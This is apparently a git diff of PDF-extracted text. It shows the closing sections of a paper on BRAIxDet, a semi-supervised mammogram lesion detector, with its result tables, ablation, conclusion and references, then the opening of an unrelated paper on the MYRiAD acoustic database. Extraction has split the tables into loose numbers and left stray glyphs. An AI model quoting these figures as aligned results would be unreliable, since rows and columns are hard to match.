+
1286
+ 0.8481
1287
+ 0.8510
1288
+
1289
+
1290
+ 0.9033
1291
+ 0.9392
1292
+
1293
+
1294
+ 0.8985
1295
+ 0.9203
1296
+
1297
+
1298
+
1299
+ 0.9084
1300
+ 0.9417
1301
+
1302
+
1303
+
1304
+
1305
+ 0.9294
1306
+ 0.9531
1307
+ tions, while displaying more accurate true positive detections.
1308
+ We also show the cross-view detections on the CC and MLO
1309
+ mammograms from the same breast in Figure 8. Notice how
1310
+ BRAIxDet is robust to false positives, and at the same time pre-
1311
+ cise at detecting the true positives from both views. We believe
1312
+ that such cross-view accuracy is enabled in part by the cross-
1313
+ view analysis provided by BRAIxDet.
1314
+ 4.5. Ablation study
1315
+ In this ablation study, we first show a visual example of the
1316
+ steps in the production of a pseudo-label for weakly-annotated
1317
+ images by the teacher in Figure 5.
1318
+ The process starts with
1319
+ the initial prediction from the BRAIxDet teacher model, which
1320
+ tends to be inaccurate, particularly at the initial SSL training
1321
+ stages.
1322
+ This issue is addressed in part by keeping only the
1323
+ most confident detection, as shown in the column ‘After box
1324
+ filtering’. In addition, the BRAIxDet teacher’s detection inac-
1325
+ curacies are also dealt with GradCAM predictions produced by
1326
+ BRAIxMVCCL (Chen et al., 2022), which are used with the
1327
+ most confident detection to produce the final pseudo-labelled
1328
+ detections.
1329
+ Table 3 shows the impact of the local co-occurrence module
1330
+ (LCM) from BRAIxMVCCL, the student-teacher SSL train-
1331
+ ing, and the use of BRAIxMVCCL’s GradCAM detections for
1332
+ the pseudo-labelling process.
1333
+ All methods in this table first
1334
+ pre-train their EfficientNet-b0 classification backbone with the
1335
+ fully- and weakly-annotated training subsets.
1336
+ The first row
1337
+ shows the Faster RCNN (Ren et al., 2015) that is trained using
1338
+
1339
+ 口口Yuanhong Chen et al. / Medical Image Analysis (2023)
1340
+ 11
1341
+ Table 4. mAP and Recall @ 0.5 results on the testing images of CBIS-DDSM using the partially labelled protocol based on splitting the fully annotated
1342
+ subset with the ratios 1/16, 1/8, 1/4, and 1/2 (we show the number of fully annotated images inside the brackets). We highlight the best result in each
1343
+ column.
1344
+ Method
1345
+ mAP
1346
+ Recall @ 0.5
1347
+ 1/16 (65)
1348
+ 1/8 (130)
1349
+ 1/4 (260)
1350
+ 1/2 (520)
1351
+ 1/16 (65)
1352
+ 1/8 (130)
1353
+ 1/4 (260)
1354
+ 1/2 (520)
1355
+ Faster RCNN (Ren et al., 2015)
1356
+ 0.2468
1357
+ 0.4269
1358
+ 0.4973
1359
+ 0.5401
1360
+ 0.3678
1361
+ 0.5496
1362
+ 0.6157
1363
+ 0.6736
1364
+ STAC (Sohn et al., 2020)
1365
+ 0.2916
1366
+ 0.4585
1367
+ 0.5755
1368
+ 0.5911
1369
+ 0.4500
1370
+ 0.6111
1371
+ 0.7144
1372
+ 0.7778
1373
+ MT (Tarvainen and Valpola, 2017)
1374
+ 0.2350
1375
+ 0.3365
1376
+ 0.5665
1377
+ 0.6562
1378
+ 0.4421
1379
+ 0.4587
1380
+ 0.6488
1381
+ 0.7397
1382
+ Unbiased Teacher (Liu et al., 2021)
1383
+ 0.3618
1384
+ 0.5001
1385
+ 0.5806
1386
+ 0.6503
1387
+ 0.5389
1388
+ 0.6198
1389
+ 0.6911
1390
+ 0.7667
1391
+ Soft Teacher (Xu et al., 2021)
1392
+ 0.4625
1393
+ 0.4920
1394
+ 0.6201
1395
+ 0.6768
1396
+ 0.5826
1397
+ 0.6612
1398
+ 0.7149
1399
+ 0.7975
1400
+ BRAIxDet
1401
+ 0.5333
1402
+ 0.6533
1403
+ 0.6927
1404
+ 0.7212
1405
+ 0.6694
1406
+ 0.7190
1407
+ 0.7562
1408
+ 0.8388
1409
+ BRAIxDet
1410
+ STAC
1411
+ Unbiased Teacher
1412
+ Soft Teacher
1413
+ Mean Teacher
1414
+ Origin
1415
+ Fig. 7. Visualisation of the results achieved by the most competitive methods and our BRAIxDet (column titles show each method’s name) on two CBIS-
1416
+ DDSM testing images, where the blue rectangles show the lesion annotations, and the red rectangles display the detections.
1417
+ only the fully-annotated training subset. The second row dis-
1418
+ plays a method that pre-trains the multi-view BRAIxMVCCL
1419
+ classifier (Chen et al., 2022) and keeps the LCM for training the
1420
+ Faster RCNN, which shows that the multi-view analysis from
1421
+ LCM provides substantial improvement to the original Faster
1422
+ RCNN. The third rows displays that our proposed student-
1423
+ teacher SSL training improves the original Faster RCNN re-
1424
+ sults because such training allows the use of the fully- and
1425
+ weakly-annotated training subsets.
1426
+ When combining Faster
1427
+ RCNN, LCM, and the student-teacher SSL training, the results
1428
+ are better than without SSL training or without LCM. Putting all
1429
+ BRAIxDet components together, including BRAIxMVCCL’s
1430
+ GradCAM detections, enables us to reach the best mAP and
1431
+ Recall @ 0.5 results.
1432
+ Another important point that was investigated is the role of
1433
+ the proposed BN approach, which is presented in Table 5. The
1434
+ results show that the proposed approach based on freezing both
1435
+ the student and teacher BN statistics is better than just updat-
1436
+ ing the student’s BN statistics, or updating both the student and
1437
+ teacher’s BN statistics (Cai et al., 2021).
1438
+
1439
+ 6口口口12
1440
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
1441
+ BRAIxDet
1442
+ STAC
1443
+ Unbiased Teacher
1444
+ Soft Teacher
1445
+ Mean Teacher
1446
+ Origin
1447
+ Fig. 8. Visualisation of the cross-view results achieved by several methods and our BRAIxDet (column titles show each method’s name) on CBIS-DDSM
1448
+ testing images containing two views of the same breast, where blue rectangles show lesion annotations, and red rectangles display the detections. Note that
1449
+ BRAIxDet is the only method that correctly localises both lesions in the two views, showing the importance of the cross-view analysis.
1450
+ Table 5. Comparison of different types of batch normalisation (BN) strate-
1451
+ gies for the student-teacher SSL stage. The first row shows the mAP and
1452
+ Recall @ 0.5 results using the usual approach, where the student updates
1453
+ its own BN statistics, but the teacher does not update the BN statistics from
1454
+ pre-training. Second row shows the competing approach (Cai et al., 2021)
1455
+ that updates the teacher’s BN statistics with the EMA from the student’s
1456
+ BN statistics. The last row shows our proposed approach based on freezing
1457
+ both the student and teacher BN statistics. Results are computed using the
1458
+ fully-labelled protocol.
1459
+ Methods
1460
+ mAP
1461
+ Recall @ 0.5
1462
+ Open BN (Tarvainen and Valpola, 2017)
1463
+ 0.9013
1464
+ 0.9311
1465
+ EMA BN (Cai et al., 2021)
1466
+ 0.9080
1467
+ 0.9366
1468
+ Freeze BN (ours)
1469
+ 0.9294
1470
+ 0.9531
1471
+ 5. Conclusion
1472
+ In this paper, we proposed a new framework for training
1473
+ breast cancer lesion detectors from mammograms using real-
1474
+ world screening mammograms datasets. The proposed frame-
1475
+ work contains a new problem setting and a new method. The
1476
+ new setting is based on large-scale real-world screening mam-
1477
+ mogram datasets, which have a subset that is fully annotated
1478
+ and another subset that is weakly annotated with just the global
1479
+ image classification and without lesion localisation – we call
1480
+ this setting malignant breast lesion detection with incomplete
1481
+ annotations. Our solution to this setting is a new method with
1482
+ the following two stages: 1) pre-training a multi-view mammo-
1483
+ gram classifier with weak supervision from the whole dataset,
1484
+ and 2) extend the trained classifier to become a multi-view
1485
+ detector that is trained with semi-supervised student-teacher
1486
+ learning, where the training set contains fully and weakly-
1487
+ annotated mammograms. We provide extensive detection re-
1488
+ sults on two real-world screening mammogram datasets con-
1489
+ taining fully and weakly-annotated mammograms, which show
1490
+ that our proposed approach has SOTA results in the detection
1491
+ of malignant breast lesions with incomplete annotations. In the
1492
+ future, we aim to further improve model performance by in-
1493
+ corporating additional multi-modal information (i.e., radiology
1494
+ reports, risk factors or ultrasound) to calibrate the confidence of
1495
+ the pseudo-label.
1496
+ Acknowledgments
1497
+ This work was supported by funding from the Australian
1498
+ Government under the Medical Research Future Fund - Grant
1499
+ MRFAI000090 for the Transforming Breast Cancer Screening
1500
+ with Artificial Intelligence (BRAIx) Project. G. Carneiro ac-
1501
+ knowledges the support by the Australian Research Council
1502
+ through grants DP180103232 and FT190100525.
1503
+
1504
+ 口中7Yuanhong Chen et al. / Medical Image Analysis (2023)
1505
+ 13
1506
+ References
1507
+ Bar, Y., Diamant, I., Wolf, L., Lieberman, S., Konen, E., Greenspan, H., 2015.
1508
+ Chest pathology detection using deep learning with non-medical training,
1509
+ in: 2015 IEEE 12th international symposium on biomedical imaging (ISBI),
1510
+ IEEE. pp. 294–297.
1511
+ Brem, R.F., Baum, J., Lechner, M., Kaplan, S., Souders, S., Naul, L.G.,
1512
+ Hoffmeister, J., 2003. Improvement in sensitivity of screening mammog-
1513
+ raphy with computer-aided detection: a multiinstitutional trial. American
1514
+ Journal of Roentgenology 181, 687–693.
1515
+ Butler, D., Zhang, Y., Chen, T., Shin, S.H., Singh, R., Carneiro, G., 2022. In
1516
+ defense of kalman filtering for polyp tracking from colonoscopy videos, in:
1517
+ 2022 IEEE 19th International Symposium on Biomedical Imaging (ISBI),
1518
+ IEEE. pp. 1–5.
1519
+ Cai, Z., Ravichandran, A., Maji, S., Fowlkes, C., Tu, Z., Soatto, S., 2021.
1520
+ Exponential moving average normalization for self-supervised and semi-
1521
+ supervised learning, in: Proceedings of the IEEE/CVF Conference on Com-
1522
+ puter Vision and Pattern Recognition, pp. 194–203.
1523
+ Carion, N., Massa, F., Synnaeve, G., Usunier, N., Kirillov, A., Zagoruyko, S.,
1524
+ 2020. End-to-end object detection with transformers, in: European confer-
1525
+ ence on computer vision, Springer. pp. 213–229.
1526
+ Carneiro, G., Nascimento, J., Bradley, A.P., 2017. Automated analysis of un-
1527
+ registered multi-view mammograms with deep learning. IEEE transactions
1528
+ on medical imaging 36, 2355–2365.
1529
+ Chen, C., Li, O., Tao, D., Barnett, A., Rudin, C., Su, J.K., 2019. This looks like
1530
+ that: deep learning for interpretable image recognition. Advances in neural
1531
+ information processing systems 32.
1532
+ Chen, Y., Wang, H., Chong, W., Tian, Y., Liu, F., Liu, Y., Elliott, M., Davis,
1533
+ M., Frazer, H., Carneiro, G., 2022.
1534
+ Multi-view local co-occurrence and
1535
+ global consistency learning improve mammogram classification general-
1536
+ isation, in: International Conference on Medical Image Computing and
1537
+ Computer-Assisted Intervention.
1538
+ Clancy, K., Aboutalib, S., Mohamed, A., Sumkin, J., Wu, S., 2020. Deep learn-
1539
+ ing pre-training strategy for mammogram image classification: an evaluation
1540
+ study. Journal of Digital Imaging 33, 1257–1265.
1541
+ Dhungel, N., Carneiro, G., Bradley, A.P., 2015. Automated mass detection in
1542
+ mammograms using cascaded deep learning and random forests, in: 2015
1543
+ international conference on digital image computing: techniques and appli-
1544
+ cations (DICTA), IEEE. pp. 1–8.
1545
+ Fenton, J.J., Abraham, L., Taplin, S.H., Geller, B.M., Carney, P.A., D’Orsi,
1546
+ C., Elmore, J.G., Barlow, W.E., Consortium, B.C.S., 2011. Effectiveness of
1547
+ computer-aided detection in community mammography practice. Journal of
1548
+ the National Cancer institute 103, 1152–1161.
1549
+ Fenton, J.J., Taplin, S.H., Carney, P.A., Abraham, L., Sickles, E.A., D’Orsi, C.,
1550
+ Berns, E.A., Cutter, G., Hendrick, R.E., Barlow, W.E., et al., 2007. Influence
1551
+ of computer-aided detection on performance of screening mammography.
1552
+ New England Journal of Medicine 356, 1399–1409.
1553
+ Girshick, R., 2015. Fast r-cnn, in: Proceedings of the IEEE international con-
1554
+ ference on computer vision, pp. 1440–1448.
1555
+ Hadjiiski, L., Sahiner, B., Chan, H.P., 2006. Advances in cad for diagnosis of
1556
+ breast cancer. Current opinion in obstetrics & gynecology 18, 64.
1557
+ He, K., Zhang, X., Ren, S., Sun, J., 2016. Deep residual learning for image
1558
+ recognition, in: Proceedings of the IEEE conference on computer vision
1559
+ and pattern recognition, pp. 770–778.
1560
+ Hu, H., Gu, J., Zhang, Z., Dai, J., Wei, Y., 2018. Relation networks for object
1561
+ detection, in: Proceedings of the IEEE conference on computer vision and
1562
+ pattern recognition, pp. 3588–3597.
1563
+ Hupse, R., Karssemeijer, N., 2009. Use of normal tissue context in computer-
1564
+ aided detection of masses in mammograms. IEEE Transactions on Medical
1565
+ Imaging 28, 2033–2041.
1566
+ Hupse, R., Samulski, M., Lobbes, M., Den Heeten, A., Imhof-Tas, M.W., Bei-
1567
+ jerinck, D., Pijnappel, R., Boetes, C., Karssemeijer, N., 2013. Standalone
1568
+ computer-aided detection compared to radiologists’ performance for the de-
1569
+ tection of mammographic masses. European radiology 23, 93–100.
1570
+ Jeong, J., Lee, S., Kim, J., Kwak, N., 2019. Consistency-based semi-supervised
1571
+ learning for object detection. Advances in neural information processing
1572
+ systems 32.
1573
+ Kingma, D.P., Ba, J., 2014. Adam: A method for stochastic optimization. arXiv
1574
+ preprint arXiv:1412.6980 .
1575
+ Laine, S., Aila, T., 2016. Temporal ensembling for semi-supervised learning.
1576
+ arXiv preprint arXiv:1610.02242 .
1577
+ Lauby-Secretan, B., Scoccianti, C., Loomis, D., Benbrahim-Tallaa, L., Bou-
1578
+ vard, V., Bianchini, F., Straif, K., 2015. Breast-cancer screening—viewpoint
1579
+ of the iarc working group. New England journal of medicine 372, 2353–
1580
+ 2358.
1581
+ LeCun, Y., Bengio, Y., Hinton, G., 2015. Deep learning. nature 521, 436–444.
1582
+ Lee, R.S., Gimenez, F., Hoogi, A., Miyake, K.K., Gorovoy, M., Rubin, D.L.,
1583
+ 2017. A curated mammography data set for use in computer-aided detection
1584
+ and diagnosis research. Scientific data 4, 1–9.
1585
+ Lehman, C.D., Wellman, R.D., Buist, D.S., Kerlikowske, K., Tosteson, A.N.,
1586
+ Miglioretti, D.L., Consortium, B.C.S., et al., 2015. Diagnostic accuracy of
1587
+ digital screening mammography with and without computer-aided detection.
1588
+ JAMA internal medicine 175, 1828–1837.
1589
+ Lei, Y., Tian, Y., Shan, H., Zhang, J., Wang, G., Kalra, M.K., 2020. Shape
1590
+ and margin-aware lung nodule classification in low-dose ct images via soft
1591
+ activation mapping. Medical image analysis 60, 101628.
1592
+ Lin, T.Y., Goyal, P., Girshick, R., He, K., Doll´ar, P., 2017. Focal loss for dense
1593
+ object detection, in: Proceedings of the IEEE international conference on
1594
+ computer vision, pp. 2980–2988.
1595
+ Liu, L., Ouyang, W., Wang, X., Fieguth, P., Chen, J., Liu, X., Pietik¨ainen, M.,
1596
+ 2020a. Deep learning for generic object detection: A survey. International
1597
+ journal of computer vision 128, 261–318.
1598
+ Liu, Y., Tian, Y., Chen, Y., Liu, F., Belagiannis, V., Carneiro, G., 2022. Per-
1599
+ turbed and strict mean teachers for semi-supervised semantic segmentation,
1600
+ in: Proceedings of the IEEE/CVF Conference on Computer Vision and Pat-
1601
+ tern Recognition, pp. 4258–4267.
1602
+ Liu, Y., Zhang, F., Zhang, Q., Wang, S., Wang, Y., Yu, Y., 2020b. Cross-view
1603
+ correspondence reasoning based on bipartite graph convolutional network
1604
+ for mammogram mass detection, in: Proceedings of the IEEE/CVF Confer-
1605
+ ence on Computer Vision and Pattern Recognition, pp. 3812–3822.
1606
+ Liu, Y.C., Ma, C.Y., He, Z., Kuo, C.W., Chen, K., Zhang, P., Wu, B., Kira,
1607
+ Z., Vajda, P., 2021. Unbiased teacher for semi-supervised object detection.
1608
+ arXiv preprint arXiv:2102.09480 .
1609
+ Ma, J., Li, X., Li, H., Wang, R., Menze, B., Zheng, W.S., 2021. Cross-view re-
1610
+ lation networks for mammogram mass detection, in: 2020 25th International
1611
+ Conference on Pattern Recognition (ICPR), IEEE. pp. 8632–8638.
1612
+ Oquab, M., Bottou, L., Laptev, I., Sivic, J., 2015. Is object localization for
1613
+ free?-weakly-supervised learning with convolutional neural networks, in:
1614
+ Proceedings of the IEEE conference on computer vision and pattern recog-
1615
+ nition, pp. 685–694.
1616
+ Paszke, A., Gross, S., Massa, F., Lerer, A., Bradbury, J., Chanan, G., Killeen,
1617
+ T., Lin, Z., Gimelshein, N., Antiga, L., et al., 2019. Pytorch: An imperative
1618
+ style, high-performance deep learning library. Advances in neural informa-
1619
+ tion processing systems 32, 8026–8037.
1620
+ Raghu, M., Zhang, C., Kleinberg, J., Bengio, S., 2019. Transfusion: Under-
1621
+ standing transfer learning for medical imaging. Advances in neural infor-
1622
+ mation processing systems 32.
1623
+ Rajpurkar, P., Irvin, J., Zhu, K., Yang, B., Mehta, H., Duan, T., Ding, D., Bagul,
1624
+ A., Langlotz, C., Shpanskaya, K., et al., 2017. Chexnet: Radiologist-level
1625
+ pneumonia detection on chest x-rays with deep learning.
1626
+ arXiv preprint
1627
+ arXiv:1711.05225 .
1628
+ Redmon, J., Divvala, S., Girshick, R., Farhadi, A., 2016. You only look once:
1629
+ Unified, real-time object detection, in: Proceedings of the IEEE conference
1630
+ on computer vision and pattern recognition, pp. 779–788.
1631
+ Ren, S., He, K., Girshick, R., Sun, J., 2015. Faster r-cnn: Towards real-time
1632
+ object detection with region proposal networks. Advances in neural infor-
1633
+ mation processing systems 28.
1634
+ Ribli, D., Horv´ath, A., Unger, Z., Pollner, P., Csabai, I., 2018. Detecting and
1635
+ classifying lesions in mammograms with deep learning. Scientific reports 8,
1636
+ 1–7.
1637
+ Russakovsky, O., Deng, J., Su, H., Krause, J., Satheesh, S., Ma, S., Huang, Z.,
1638
+ Karpathy, A., Khosla, A., Bernstein, M., et al., 2015. Imagenet large scale
1639
+ visual recognition challenge. International journal of computer vision 115,
1640
+ 211–252.
1641
+ Seibold, C., Kleesiek, J., Schlemmer, H.P., Stiefelhagen, R., 2020. Self-guided
1642
+ multiple instance learning for weakly supervised disease classification and
1643
+ localization in chest radiographs, in: Asian Conference on Computer Vision,
1644
+ Springer. pp. 617–634.
1645
+ Selvaraju, R.R., Cogswell, M., Das, A., Vedantam, R., Parikh, D., Batra, D.,
1646
+ 2017.
1647
+ Grad-cam: Visual explanations from deep networks via gradient-
1648
+ based localization, in: Proceedings of the IEEE international conference on
1649
+ computer vision, pp. 618–626.
1650
+ Selvi, R., 2014. Breast diseases: imaging and clinical management. Springer.
1651
+ Shen, L., Margolies, L.R., Rothstein, J.H., Fluder, E., McBride, R., Sieh, W.,
1652
+ 2019a. Deep learning to improve breast cancer detection on screening mam-
1653
+
1654
+ 14
1655
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
1656
+ mography. Scientific reports 9, 1–12.
1657
+ Shen, Y., Wu, N., Phang, J., Park, J., Kim, G., Moy, L., Cho, K., Geras, K.J.,
1658
+ 2019b. Globally-aware multiple instance classifier for breast cancer screen-
1659
+ ing, in: International Workshop on Machine Learning in Medical Imaging,
1660
+ Springer. pp. 18–26.
1661
+ Shen, Y., Wu, N., Phang, J., Park, J., Liu, K., Tyagi, S., Heacock, L., Kim,
1662
+ S.G., Moy, L., Cho, K., et al., 2021. An interpretable classifier for high-
1663
+ resolution breast cancer screening images utilizing weakly supervised local-
1664
+ ization. Medical image analysis 68, 101908.
1665
+ Smith, K., 2017.
1666
+ Cbis-ddsm.
1667
+ https://wiki.cancerimagingarchive.
1668
+ net/display/Public/CBIS-DDSM. [Online; accessed 21-August-2021].
1669
+ Sohn, K., Zhang, Z., Li, C.L., Zhang, H., Lee, C.Y., Pfister, T., 2020. A simple
1670
+ semi-supervised learning framework for object detection.
1671
+ arXiv preprint
1672
+ arXiv:2005.04757 .
1673
+ Sung, H., Ferlay, J., Siegel, R.L., Laversanne, M., Soerjomataram, I., Jemal,
1674
+ A., Bray, F., 2021. Global cancer statistics 2020: Globocan estimates of
1675
+ incidence and mortality worldwide for 36 cancers in 185 countries. CA: a
1676
+ cancer journal for clinicians 71, 209–249.
1677
+ Tan, M., Le, Q., 2019. Efficientnet: Rethinking model scaling for convolutional
1678
+ neural networks, in: International Conference on Machine Learning, PMLR.
1679
+ pp. 6105–6114.
1680
+ Tarvainen, A., Valpola, H., 2017. Mean teachers are better role models: Weight-
1681
+ averaged consistency targets improve semi-supervised deep learning results.
1682
+ Advances in neural information processing systems 30.
1683
+ Vu, Y.N.T., Tsue, T., Su, J., Singh, S., 2021. An improved mammography
1684
+ malignancy model with self-supervised learning, in: Medical Imaging 2021:
1685
+ Computer-Aided Diagnosis, SPIE. pp. 210–216.
1686
+ Wang, X., Peng, Y., Lu, L., Lu, Z., Bagheri, M., Summers, R.M., 2017. Chestx-
1687
+ ray8:
1688
+ Hospital-scale chest x-ray database and benchmarks on weakly-
1689
+ supervised classification and localization of common thorax diseases, in:
1690
+ Proceedings of the IEEE conference on computer vision and pattern recog-
1691
+ nition, pp. 2097–2106.
1692
+ Xu, M., Zhang, Z., Hu, H., Wang, J., Wang, L., Wei, F., Bai, X., Liu, Z., 2021.
1693
+ End-to-end semi-supervised object detection with soft teacher, in: Proceed-
1694
+ ings of the IEEE/CVF International Conference on Computer Vision, pp.
1695
+ 3060–3069.
1696
+ Yang, Z., Cao, Z., Zhang, Y., Han, M., Xiao, J., Huang, L., Wu, S., Ma, J.,
1697
+ Chang, P., 2020. Momminet: Mammographic multi-view mass identifica-
1698
+ tion networks, in: International Conference on Medical Image Computing
1699
+ and Computer-Assisted Intervention.
1700
+ Yang, Z., Cao, Z., Zhang, Y., Tang, Y., Lin, X., Ouyang, R., Wu, M., Han, M.,
1701
+ Xiao, J., Huang, L., et al., 2021. Momminet-v2: Mammographic multi-view
1702
+ mass identification networks. Medical Image Analysis , 102204.
1703
+ Yao, L., Prosky, J., Poblenz, E., Covington, B., Lyman, K., 2018. Weakly su-
1704
+ pervised medical diagnosis and localization from multiple resolutions. arXiv
1705
+ preprint arXiv:1803.07703 .
1706
+ Zhou, B., Khosla, A., Lapedriza, A., Oliva, A., Torralba, A., 2016. Learning
1707
+ deep features for discriminative localization, in: Proceedings of the IEEE
1708
+ conference on computer vision and pattern recognition, pp. 2921–2929.
1709
+
1NFQT4oBgHgl3EQf1DYE/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
1dFPT4oBgHgl3EQfUjQc/content/tmp_files/2301.13057v1.pdf.txt ADDED
@@ -0,0 +1,1645 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Dietzen et al.
2
+ RESEARCH
3
+ MYRiAD:
4
+ A Multi-Array Room Acoustic Database
5
+ Thomas Dietzen1*, Randall Ali1, Maja Taseska2 and Toon van Waterschoot1
6
+ Abstract
7
+ In the development of acoustic signal processing algorithms, their evaluation in various acoustic environments
8
+ is of utmost importance. In order to advance evaluation in realistic and reproducible scenarios, several
9
+ high-quality acoustic databases have been developed over the years. In this paper, we present another
10
+ complementary database of acoustic recordings, referred to as the Multi-arraY Room Acoustic Database
11
+ (MYRiAD). The MYRiAD database is unique in its diversity of microphone configurations suiting a wide range
12
+ of enhancement and reproduction applications (such as assistive hearing, teleconferencing, or sound zoning),
13
+ the acoustics of the two recording spaces, and the variety of contained signals including 1214 room impulse
14
+ responses (RIRs), reproduced speech, music, and stationary noise, as well as recordings of live cocktail parties
15
+ held in both rooms. The microphone configurations comprise a dummy head (DH) with in-ear omnidirectional
16
+ microphones, two behind-the-ear (BTE) pieces equipped with 2 omnidirectional microphones each, 5 external
17
+ omnidirectional microphones (XMs), and two concentric circular microphone arrays (CMAs) consisting of 12
18
+ omnidirectional microphones in total. The two recording spaces, namely the SONORA Audio Laboratory (SAL)
19
+ and the Alamire Interactive Laboratory (AIL), have reverberation times of 2.1 s and 0.5 s, respectively. Audio
20
+ signals were reproduced using 10 movable loudspeakers in the SAL and a built-in array of 24 loudspeakers in
21
